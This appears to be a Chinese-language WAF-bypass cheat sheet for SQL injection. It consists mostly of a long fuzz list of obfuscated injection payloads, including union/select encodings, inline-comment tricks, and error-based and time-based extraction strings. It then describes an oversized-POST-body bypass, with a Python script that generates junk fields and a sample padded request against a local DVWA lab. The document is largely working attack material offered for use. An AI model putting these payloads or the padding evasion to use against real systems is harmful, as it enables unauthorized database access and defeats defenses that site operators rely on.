如果目标站点支持 HTTPS，尽量通过 HTTPS 进行测试：部分 WAF/流量检测设备只对明文 HTTP 做检测，或其在 HTTPS 上的规则覆盖与 HTTP 并不一致，需要分别验证。
注入bypass fuzz waf
'
--
' order/*/*/by/**/1--+
' order/**/by 1 --+
!
"
"%20and%20"1"="1
"%20and%20"1"="2
"%20OR%20"1"="1
"%20OR%20"1"="2
#
%
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
%09union%09select 1,2
%0a
%0A%20
%0aunion%0aselect 1,2
%0b
%0baunion%0bselect 1,2
%0c
%0caunion%0cselect 1,2
%0d
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%20
'%20and%20'1'='1
'%20and%20'1'='2
'%20OR%20'1'='1
'%20OR%201=1--%20-
'%20OR%20'1'='2
'%20OR%201=2--%20-
%22
%23
%23%0afrom
%23?%0auion%20?%23?%0aselect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%252f%252a*/union%252f%252a /select%252f%252a*/
%26 1=1
%26 1=2
%26 hex(0)
%26 hex(1)
%27
%2d%2d%0afrom
%2d%2d%0from
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect%2f**%2f
%2f**%2funion%2f**%2fselect%2f**%2f
%53eLEct
%55nion %53eLEct
%55nion %53eLEct
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
%a0
%a0from
%df
%u0066rom
&
&&
&& 1=1
&& 1=2
(
(information_schema.schemata)
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
)
)%20and%20(1=1
')%20and%20('1'='1
)%20and%20(1=2
')%20and%20('1'='2
)%20OR%20(1=1
')%20OR%20('1'='1
)%20OR%20(1=2
')%20OR%20('1'='2
)%20OR%201=1--%20-
')%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=2--%20-
*
*/*
*9e0UnIoN
*9e0UnIoN*9e0slect
,
.
/
/%23A%0a/
/%2A%2A/union/%2A%2A/select/%2A%2A/
/&id=1308%20order%20by%2035&b=/
/*
/* */union/* */select/ */1,2;
/*!%23/*%0afrom*/
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!00000%23/*%0afrom*/
/*!10440union%0aselect*/
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000UniON SeLeCt*/
/*!50000union*//*!50000select*/1,2
/*!5000updatexml*/(1,1,1)
/*!from*/
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!u%6eion*/ /*!se%6cect*/
/*!uNIOn*/ /*!SelECt*/
/*!uNIOn*/ /*!SelECt*/
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!union*/+/*!select*/
/*!UnIoN*/SeLecT+
/*!UnIoN*/SeLecT+
/**/
/**//*!12345UNION SELECT*//**/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!union*//**//*!select*//**/
/**//*!union*//**//*!select*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**_**/UnIoN(/*!50000SeLeCt*/
/*xxx*/()
/*中文*/union/*中文*/select/*中文*/1,2;
//
//*
;
@
@;
\'
\\
\Nfrom
\Nselect
\Nunion
^
`
`information_schema`.`schemata`
`information_schema`.schemata
`updatexml`(1,(select @@version),1)
`users`
|
||
|| 1=0
|| 1=1
'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
~
-~
+
--+
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#uNiOn+#sEleCt
+#uNiOn+#sEleCt
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+or+0x3a!=1--+
+or+0x3a=1--+
+un/**/ion+se/**/lect
+un/**/ion+se/**/lect
+uni%0bon+se%0blect+
+uni%0bon+se%0blect+
+UnIOn%0d%0aSeleCt%0d%0a
+UnIOn%0d%0aSeleCt%0d%0a
+union+distinct+select+
+union+distinct+select+
+union+distinctROW+select+
+union+distinctROW+select+
+UNunionION+SEselectLECT+
+UNunionION+SEselectLECT+
<
<>
=
>
1' order--%0aby--%0a1--%0a--+
'1'='1
1efrom
2.0 from
8e0from
ADD
admin'
admin.users
admin+.user
all
alter
anandd
AND
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and -1=-1
and 1=2
and -2<-1
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
'and extractvalue/*/676*/(1,concat(0x7e,database/*/387*/(),x07e))--+
and hex()
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and%201=1
and%201=2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
and/*@%$^(*/ 1=1
and+0x3a!=info()--
as
ascii
Ascii(1)
ASSIC
atan()
BEFORE
benchmark
benchmark()
bin
BY
case
CAST
CAST()
ceil()
ceiling()
char
CHAR(102, 114, 111, 109)
Char(49)
Char('97')
col_name()
COLUMN
CONCAT
concat()
concat(version(),'|',user());
concat_ws
concat_ws()
concat_ws('|',1,2,3)
convert()
COUNT
CREATE
CURSOR
database
database /*//--/*/ ()
database%23x%0A()
database()
database()||’
database/*!20553()*/
database/*!20553()*/--+
database/**/()
database/*///-*/()
database/*/11111*/()
database/*xxx*/()
database+()
DATABASES
db_name()
delete
drop
e0FrOm
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
else
END
exec
exp()
extracavalue()
extractvalue
floor
floor()
for
format
FrOFrOmm
FrOm
from/*!%23/*%0ainformation_schema.tables*/
from/*!--+/*%0ainformation_schema.columns*/
from/*!--+/*%0ainformation_schema.tables*/
from/*!information_schema.tables*/
GeometryCollection
greatest()
GROUP
group by 1
group_concat
handler
HAS_DBACCESS()
having
hex
Hex('a')
hex(user/**/(/**/))
id =1' and 1=1 --+
id =1' and 1=2 --+
id =1' or '1'='1
id=1' || '1'='1
id=-1' like "[%23]" /*!10440union select*/ 1,2,3 --+
id=1' or 1=1#
IF
in
INFILE
INFORMATION
Information_schema./**_**/Tables
information_schema.`schemata`
information_schema.tables
information_schema/**/.schemata
infromation_schema
insert
inset
instr
INTO
into @a,@b,@c,@d;
IS_MEMBER()
IS_SRVROLEMEMBER()
JOIN
LEAVE
left
Left(@@version,1)
Left(version(),1)
Length
LEVEL
like
like "[%23]" /*!10440union select*/
like["%23"]
LIMIT
limit 1 offset 0
Lpad(version(),1,1)
mid
mid()substring()
mid(version() from 1 for 1)
Mid(version(),1,1)
MultiLineString
MultiPoint
NAMES
NEXT
NULL
null+UNION+SELECT+1,2
object_id()
OF
ON
oorr
OR
or 1=0
or 1=1
OR%201=1
OR%201=2
ORD
order
order /*//--/*/ by
order aby
order by
order by 1
order--%0aby
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
OUTFILE
Polygon
prepare
procedure analyse()
rand()
REGEXP
RENAME
REPLACE
REVERSE
REVERSE(noinu)+REVERSE(tceles)
REVERSE(noinu)+REVERSE(tceles)
reverse(right(reverse(version()),1)
right
Right(@@version,1)
RLIKE
Rpad(version(),1,1)
s%u0065lect
s%u006c%u0006ect
s%u00f0lect
SCHEMA
se%0blect
sel%e%ct
sele%ct
sele/**/ct
SeleCt
select * from user where username in('user');
select * from user where username like 'user';
select * from user where username='user';
select union select{x 1},
select(1)from
select{x user}from{x mysql.user};
SEPARATOR
SET
SHOW
sign()
sleep
sleep()
SQL
sqrt()
substr()
Substr(version(),1,1)
substring
Substring(@@version,1,1)
Substring(version(),1,1)
sys schemma
sys.schema_table_statistics_with_buffer
TABLE
TABLE_SCHEMA
tan()
THEN
TRUE
u%6eion s%65lect
u%6eion se%6cect
u%6eion se%6cect
un?+un/**/ion+se/**/lect+
Unhex(61)
uni%0bon+se%0blect
uni%0bon+se%0blect
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
unio%6e%20%64istinc%74%20%73elect
UNioN
union /*!00000%23%0aselect*/
union -- 1%0a select
union -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (/*!/**/ SeleCT */ 1,2,3)
union (select)
union /*!50000%53elect*/
union /*!50000%53elect*/
union /*//--/*/ select
union /*@%$^(*/ select
union /*@%$^(*/ select --+
union all %u0053elect
union all select
union all select 1,2
union all%23%0a select
union distinct
union DISTINCT select
union DISTINCT select 1,2
union distinctrow
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20%64istinctRO%57%20select
union%20/*!44509select*/%20
union%2053elect
union%2053elect
union%20all%23%0a%20select%20
union%20distinct%20select
union%20distinct%20select
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%250Cselect
union%25A0select
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
UNION/*&test=1*/SELECT/*&pwn=2*/
union/*&username=*/select
union/**/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//--**/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
union/aaaa%01bbs/select
union/aaaaaaaaaaaaaaaaaaaaaaa/select
union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
UNiOn--+%02%0d%0aselect
union+/*!select*/
union+/*!select*/
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
UPDATE
updatexml
updatexml()
user
user()
user/**/()--+
users
USING
VALUE
VALUES
VARCHAR
VERSION
when
WHERE
xor
绕过方式1:超大数据包绕过(mysql)
假如 HTTP 请求的 POST BODY 太大，若对全部内容做检测，WAF 集群会消耗过多的 CPU、内存资源，因此许多 WAF 只检测请求体前面的一段内容（具体阈值因产品和配置而异，常见说法是前 2M 或 4M）。对攻击者而言，只需在 POST BODY 前面填充大量无用数据，把真正的 payload 放在最后，使其落在检测窗口之外，即可绕过 WAF 检测。
绕过技巧:•GET 型请求转为 POST 型•让请求体长度（Content-Length）超过 WAF 的检测阈值（下面示例用的是大于 8200 字节，实际阈值需逐步增大测试）•正常参数必须放在脏数据之后，否则 payload 仍落在检测窗口内而无效
zangshuju.py（脏数据生成脚本。用法：python zangshuju.py <字段数量>，输出一段以 & 包裹的随机键值对，直接粘贴到真实参数之前）
#coding=utf-8
import random,string
import sys
from urllib import parse
# Inclusive length bounds for the random junk field names and values.
varname_min = 5
varname_max = 15
data_min = 20
data_max = 30
# Loop bounds for how many junk fields to emit; the upper bound is the first
# CLI argument (IndexError if it is missing, ValueError if it is not an integer).
num_min = 1
num_max = int(sys.argv[1])
def randstr(length):
    """Return a string of *length* random ASCII letters.

    Used only to manufacture filler field names/values; ``random`` is fine
    here because nothing secret depends on the output.
    """
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))
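def main():
    """Print (and return) a block of junk form fields to paste before the real ones.

    Emits ``num_max`` fields -- the count given on the command line -- with
    random names and values, URL-encoded and wrapped in ``&`` on both sides so
    the output can be dropped verbatim in front of the real ``key=value``
    pairs of a POST body.

    Fixes: the original loop ``range(num_min, num_max)`` produced one field
    fewer than requested, and a random name colliding with an earlier one
    silently dropped an entry; drawing until the dict holds ``num_max``
    distinct keys gives exactly the requested count.  ``num_max <= 0`` yields
    just ``&&``.
    """
    data = {}
    while len(data) < num_max:
        name = randstr(random.randint(varname_min, varname_max))
        data[name] = randstr(random.randint(data_min, data_max))
    # Names/values are ASCII letters only, so urlencode() adds no escapes here;
    # it is kept so the output stays a valid form body if the alphabet changes.
    junk = '&' + parse.urlencode(data) + '&'
    print(junk)
    return junk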
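# Only run when executed as a script, so the generator can also be imported.
if __name__ == "__main__":
    main()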
POST /dvwa/vulnerabilities/sqli/?Submit=Submit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8200
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit
Cookie: security=low; ECS[visit_times]=1; PHPSESSID=90a4331de18bcd32ee2d780254f44589
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
a=/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB